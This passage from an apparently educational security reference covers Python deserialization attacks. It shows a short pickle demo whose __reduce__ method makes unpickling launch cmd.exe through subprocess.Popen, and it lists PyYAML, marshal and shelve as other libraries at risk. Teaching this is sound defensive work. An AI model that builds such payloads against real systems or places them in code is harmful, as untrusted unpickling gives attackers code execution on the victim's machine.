5.2.2. Deserialization¶
5.2.2.1. pickle demo¶
Python Pickle will call __reduce__ during deserialization, a custom``__reduce__`` function can be used to implement the attack.
import pickle
import pickletools
import subprocess
class A(object):
a = 1
b = 2
def __reduce__(self):
return (subprocess.Popen, (('cmd.exe',),))
data = pickle.dumps(A())
pickletools.dis(data)
5.2.2.2. Other serialization libraries¶
PyYAML
marshal
shelve